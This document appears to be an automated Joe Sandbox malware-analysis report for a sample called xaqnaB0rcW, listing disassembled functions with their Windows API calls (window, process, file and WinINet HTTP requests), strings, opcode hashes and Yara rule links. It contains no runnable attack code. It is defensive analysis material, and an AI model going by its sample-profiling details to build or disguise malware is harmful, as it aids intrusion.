                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: 57255549c9510c6bd3fd6f72b24a4933a0258b3200ca23bb3d0e1ef34badd15c
                                                                  • Instruction ID: 98b3b13d9d6336a530ab5592ceda5533ed0ebdf6a5d685218bfa09968b342f3f
                                                                  • Opcode Fuzzy Hash: 57255549c9510c6bd3fd6f72b24a4933a0258b3200ca23bb3d0e1ef34badd15c
                                                                  • Instruction Fuzzy Hash: 21912B746016028FC706EF24C895F68F3A8FF04345F5581A9E90AAB272DB30AE5ACF40
                                                                  Function 0036CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0036CC15
                                                                    • Part of subcall function 0036CCCD: GetClientRect.USER32(?,?), ref: 0036CCF6
                                                                    • Part of subcall function 0036CCCD: GetWindowRect.USER32(?,?), ref: 0036CD37
                                                                    • Part of subcall function 0036CCCD: ScreenToClient.USER32(?,?), ref: 0036CD5F
                                                                  • GetDC.USER32 ref: 003CD137
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003CD14A
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 003CD158
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 003CD16D
                                                                  • ReleaseDC.USER32(?,00000000), ref: 003CD175
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003CD200
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 2e8f8a35c303238dfa3f97ec8995488fac00ed2132bb09eb377b9ae6a18af969
                                                                  • Instruction ID: 168e3cc9c9d8d4d015b3365a8dfc2a6a62bc85857d813d42716e1b8813e6a09f
                                                                  • Opcode Fuzzy Hash: 2e8f8a35c303238dfa3f97ec8995488fac00ed2132bb09eb377b9ae6a18af969
                                                                  • Instruction Fuzzy Hash: 0071AB30500205DFCF239F64C885EBA7BB9FF48354F19826AF9959A6AAC7318C41DB50
                                                                  Function 003BECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                    • Part of subcall function 0036B63C: GetCursorPos.USER32(000000FF), ref: 0036B64F
                                                                    • Part of subcall function 0036B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0036B66C
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000001), ref: 0036B691
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000002), ref: 0036B69F
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 003BED3C
                                                                  • ImageList_EndDrag.COMCTL32 ref: 003BED42
                                                                  • ReleaseCapture.USER32 ref: 003BED48
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 003BEDF0
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003BEE03
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 003BEEDC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 1924731296-2107944366
                                                                  • Opcode ID: b92e8dc91932addce7402fbc5cf9b8565a6bc7d963fd9fb42b176275221279b6
                                                                  • Instruction ID: 7b8783a895acadc5d4c445bbde648f01208dfb48a0828dadd35c896d6cde38e8
                                                                  • Opcode Fuzzy Hash: b92e8dc91932addce7402fbc5cf9b8565a6bc7d963fd9fb42b176275221279b6
                                                                  • Instruction Fuzzy Hash: 2251AD70104304AFD711DF24DC96FAA77E8FB88708F00892DFA959B2E1DB719948CB52
                                                                  Function 003A45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003A45FF
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003A462B
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003A466D
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003A4682
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A468F
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003A46BF
                                                                  • InternetCloseHandle.WININET(00000000), ref: 003A4706
                                                                    • Part of subcall function 003A5052: GetLastError.KERNEL32(?,?,003A43CC,00000000,00000000,00000001), ref: 003A5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 1241431887-3916222277
                                                                  • Opcode ID: c6cadb5f57bf3ce415c46df7e703e020dd6043a63f24e270668515a044129ee3
                                                                  • Instruction ID: 0eeacade63035b489024aa66ba9b281d17c82c6aa587880c538f76fa8b793429
                                                                  • Opcode Fuzzy Hash: c6cadb5f57bf3ce415c46df7e703e020dd6043a63f24e270668515a044129ee3
                                                                  • Instruction Fuzzy Hash: FB417CB1501209BFEB139F54DC89FBB77ACFF4A314F004016FA059A191D7B09D448BA4
                                                                  Function 003AB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003EDC00), ref: 003AB715
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003EDC00), ref: 003AB749
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003AB8C1
                                                                  • SysFreeString.OLEAUT32(?), ref: 003AB8EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: 23157bf293cb0c54f6bd225a73d0d9b817c15b47c417ea8271fbc8cd47c9b10c
                                                                  • Instruction ID: 971c91a51ad103aa1dcd653ca9d627f79be162847d96d18849dfb441e1d7df97
                                                                  • Opcode Fuzzy Hash: 23157bf293cb0c54f6bd225a73d0d9b817c15b47c417ea8271fbc8cd47c9b10c
                                                                  • Instruction Fuzzy Hash: B0F15E71A00209EFCF05DFA4C888EAEB7B9FF4A315F118459F905AB251DB31AE45CB90
                                                                  Function 003B24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003B24F5
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003B2688
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003B26AC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003B26EC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003B270E
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B286F
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003B28A1
                                                                  • CloseHandle.KERNEL32(?), ref: 003B28D0
                                                                  • CloseHandle.KERNEL32(?), ref: 003B2947
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: 1a03fc55ab622f1ff8290d643b9ff0d16f82d92953a0886b5d63422399f1c5a7
                                                                  • Instruction ID: 4a2bc5fb86cf1ccf12dd34447df15ff232a09363e7b92ddfd46856726688acd1
                                                                  • Opcode Fuzzy Hash: 1a03fc55ab622f1ff8290d643b9ff0d16f82d92953a0886b5d63422399f1c5a7
                                                                  • Instruction Fuzzy Hash: A0D1B131604300DFCB26EF24C851BAABBE5AF85314F15895EF9999F6A2DB30DC44CB52
                                                                  Function 003BB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003BB3F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 696f57acbfc3385367cbe0165c1fc0ea19d87d942a0ff51eefa91889577e2a0e
                                                                  • Instruction ID: 5508228fd570a71d98f03d464a39936c153da4c7bad9d0708889cba403ba6751
                                                                  • Opcode Fuzzy Hash: 696f57acbfc3385367cbe0165c1fc0ea19d87d942a0ff51eefa91889577e2a0e
                                                                  • Instruction Fuzzy Hash: 1D516074600204BBEB339B29DC85BE9BBA8BB0531CF644012F759DA9A1DBF1E9508B51
                                                                  Function 0036A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003CDB1B
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CDB3C
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003CDB51
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003CDB6E
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003CDB95
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0036A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003CDBA0
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003CDBBD
                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0036A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003CDBC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1268354404-0
                                                                  • Opcode ID: 7e1ae673f049e6e411172708cb0e4aef486a6b9114149d1415b1c480ce10dab6
                                                                  • Instruction ID: d86388680fba72cc6446122b7c98c2c5e12c5da07d1abb2734eccc90ae5a5bf0
                                                                  • Opcode Fuzzy Hash: 7e1ae673f049e6e411172708cb0e4aef486a6b9114149d1415b1c480ce10dab6
                                                                  • Instruction Fuzzy Hash: ED517B70600608EFDB22DF64DC81FAA77B9AB08354F114529F906EB6A0D7B0ED80DF50
                                                                  Function 00397555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00395FA6,?), ref: 00396ED8
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00395FA6,?), ref: 00396EF1
                                                                    • Part of subcall function 003972CB: GetFileAttributesW.KERNEL32(?,00396019), ref: 003972CC
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 003975CA
                                                                  • _wcscmp.LIBCMT ref: 003975E2
                                                                  • MoveFileW.KERNEL32(?,?), ref: 003975FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: ad3e6fac0e24c8909a7195dd85663fa0e089de522b46d31895a9303948dbde63
                                                                  • Instruction ID: a2dbd42c5a707cc60a0d9c0b1c68d866fe27f7280fadd8dd93ca4aa95544b1b2
                                                                  • Opcode Fuzzy Hash: ad3e6fac0e24c8909a7195dd85663fa0e089de522b46d31895a9303948dbde63
                                                                  • Instruction Fuzzy Hash: B95141B2A192199EDF66EB94D841DDE73BC9F08310F0044AAF609E7481EA7497C9CF60
                                                                  Function 0036EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 0036EAEB
                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 0036EB32
                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 003CDC86
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 003CDCF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 764fa721ecb32790a1e80681f2610b16be191250c8872ba9cae022856a872aa5
                                                                  • Instruction ID: d8acac75e8d3a37532f72a01072c0d8bcf6d7722dda8c366fbc0d79191566a7e
                                                                  • Opcode Fuzzy Hash: 764fa721ecb32790a1e80681f2610b16be191250c8872ba9cae022856a872aa5
                                                                  • Instruction Fuzzy Hash: 2C41F57860D2809AD7374B28DD8DF7A7B9EAB41305F1AC41EF04787969C670AC48D715
                                                                  Function 0038B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0038AEF1,00000B00,?,?), ref: 0038B26C
                                                                  • HeapAlloc.KERNEL32(00000000,?,0038AEF1,00000B00,?,?), ref: 0038B273
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0038AEF1,00000B00,?,?), ref: 0038B288
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0038AEF1,00000B00,?,?), ref: 0038B290
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0038AEF1,00000B00,?,?), ref: 0038B293
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0038AEF1,00000B00,?,?), ref: 0038B2A3
                                                                  • GetCurrentProcess.KERNEL32(0038AEF1,00000000,?,0038AEF1,00000B00,?,?), ref: 0038B2AB
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0038AEF1,00000B00,?,?), ref: 0038B2AE
                                                                  • CreateThread.KERNEL32(00000000,00000000,0038B2D4,00000000,00000000,00000000), ref: 0038B2C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: dd90ad3f8f58de50119c40cfd033860ae93368e0815fb43df8e9945467117512
                                                                  • Instruction ID: bf5e653f3f6cb11a4568577a0a12c3a2c92eaee3b29e1e107dd6b11b7fc3f283
                                                                  • Opcode Fuzzy Hash: dd90ad3f8f58de50119c40cfd033860ae93368e0815fb43df8e9945467117512
                                                                  • Instruction Fuzzy Hash: 7701C9B5641308BFE711AFA5EC4DF6B7BACEB88711F058412FA05DB1A1CA749800CB61
                                                                  Function 003AC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: 39c846e7b95a0f9fa81a373969f927bd1547904df8808968a46876a3455f050f
                                                                  • Instruction ID: f0a63bbc72edb6f1ffecd84e8c5dafa73ffc2fab963b50293588c43ef92580f4
                                                                  • Opcode Fuzzy Hash: 39c846e7b95a0f9fa81a373969f927bd1547904df8808968a46876a3455f050f
                                                                  • Instruction Fuzzy Hash: 75E1E371A10219AFCF16DFA8C885BEE77B9FF4A314F158029F905AB281D771AD41CB90
                                                                  Function 003A16DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                  • _wcstok.LIBCMT ref: 003A184E
                                                                  • _wcscpy.LIBCMT ref: 003A18DD
                                                                  • _memset.LIBCMT ref: 003A1910
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X$p2@l2@
                                                                  • API String ID: 774024439-1235596074
                                                                  • Opcode ID: 007e2206b5878b5e1c77b1c0665484326f0b4af5e73cb3bbc8456ddfb051a257
                                                                  • Instruction ID: 4103b075de2e493e670b78c16734549bd949d3c61ad42f89006d9e5ba91a09ad
                                                                  • Opcode Fuzzy Hash: 007e2206b5878b5e1c77b1c0665484326f0b4af5e73cb3bbc8456ddfb051a257
                                                                  • Instruction Fuzzy Hash: A0C190356043409FC726EF24C991E5AB7E4FF85355F01896DF89A9B2A1DB70ED08CB82
                                                                  Function 003B9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003B9B19
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 003B9B2D
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003B9B47
                                                                  • _wcscat.LIBCMT ref: 003B9BA2
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 003B9BB9
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003B9BE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 4109f0640831aa558596ec247fd16437d60f5018c6ba589efd3f53fa94c84885
                                                                  • Instruction ID: 9bf290d38b95cd34d6e9d1309a26a8f136f3053451ae25bb899cb72f2f7d416f
                                                                  • Opcode Fuzzy Hash: 4109f0640831aa558596ec247fd16437d60f5018c6ba589efd3f53fa94c84885
                                                                  • Instruction Fuzzy Hash: 2241BF70940308ABEB22DF64DC85BEA77A8EF08354F11442AF749AB291C6759D84CB60
                                                                  Function 003B172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
